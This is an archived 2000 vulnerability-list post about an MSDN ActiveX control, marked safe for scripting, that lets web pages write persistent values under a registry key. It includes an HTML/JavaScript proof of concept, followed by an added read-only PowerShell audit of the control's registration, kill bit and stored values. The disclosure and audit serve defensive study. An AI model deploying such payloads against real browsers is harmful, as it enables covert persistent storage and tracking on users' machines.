Vulnerability Development mailing list archives
DevDoc ActiveX Cookie
From: Рягин Михаил Юрьевич <ryagin () EXTRIM RU>
Date: Wed, 8 Nov 2000 12:55:55 +0500
There is an ActiveX object, included, for example, in Microsoft MSDN
(developer's e-library), marked as safe for scripting, which allows
storing special "dev-cookies" on the user's computer.
Dev-Cookie is a named string of length <=126.
Name is limited to 127 characters.
It is saved under HKCU\Software\Microsoft\DevDoc\Cookie registry key
and keeps being available even after system reboots.
Example code:
------cut here-----
<OBJECT CLASSID="clsid:59CC0C20-679B-11D2-88BD-0800361A1803"
WIDTH=100 HEIGHT=100
ID="Cook">
</OBJECT>
<A HREF="javascript:Cook.putValue('windows','suxx');">put</A>
<A HREF="javascript:var c=Cook.getValue('windows'); alert('windows is '+c);">get</A>
-----cut there-----
First, click on 'put' link.
Second, close your browser window. You can even reboot your PC.
Third, click on 'get' link.
The malicious code is in the %Program Files%\Common Files\Microsoft Shared\MSDN\CookDoc.dll.
Tested on: Windows 2000, Windows 98, MSDN April 99, January 2000
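
An added audit example, not part of the original post: a read-only PowerShell check of whether the control with the CLSID above is registered on a host, whether it is registered as safe for scripting, whether its kill bit is set, and what is stored under the registry key the post names. It assumes each dev-cookie is a named value directly under that key; the function name Get-DevDocCookieAudit is hypothetical.

```powershell
# Added audit example; not code from the original post. Read-only.
$Clsid      = '{59CC0C20-679B-11D2-88BD-0800361A1803}'  # CLSID from the post
$CookieKey  = 'HKCU:\Software\Microsoft\DevDoc\Cookie'   # key named in the post
$SafeScript = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForScripting
$KillBit    = 0x400                                      # "do not load in IE" flag

function Get-DevDocCookieAudit {
    $clsRoot = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $compat  = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

    # Kill bit: Internet Explorer refuses to instantiate the control
    # when bit 0x400 is set in "Compatibility Flags".
    $flags = 0
    if (Test-Path -LiteralPath $compat) {
        $p = Get-ItemProperty -LiteralPath $compat -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue
        if ($p) { $flags = [int]$p.'Compatibility Flags' }
    }

    # Assumption: each dev-cookie is a named value directly under the key.
    # Only names and lengths are reported, not the stored strings.
    $cookies = @()
    if (Test-Path -LiteralPath $CookieKey) {
        $key = Get-Item -LiteralPath $CookieKey
        $cookies = @($key.GetValueNames() | ForEach-Object {
            [pscustomobject]@{
                Name   = $_
                Length = ([string]$key.GetValue($_)).Length
            }
        })
    }

    # Path of the DLL that implements the control, if it is registered.
    $server = (Get-ItemProperty -LiteralPath "$clsRoot\InprocServer32" `
                   -ErrorAction SilentlyContinue).'(default)'

    [pscustomobject]@{
        ControlRegistered = Test-Path -LiteralPath $clsRoot
        ServerPath        = $server
        # A control can also declare safety through IObjectSafety, so a
        # missing category does not prove it is unsafe for scripting.
        SafeForScripting  = Test-Path -LiteralPath "$clsRoot\Implemented Categories\$SafeScript"
        KillBitSet        = ($flags -band $KillBit) -ne 0
        StoredCookies     = $cookies
    }
}

Get-DevDocCookieAudit | Format-List
```

On 64-bit Windows a 32-bit control is registered in the 32-bit registry view, so run the check from a 32-bit PowerShell session as well.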
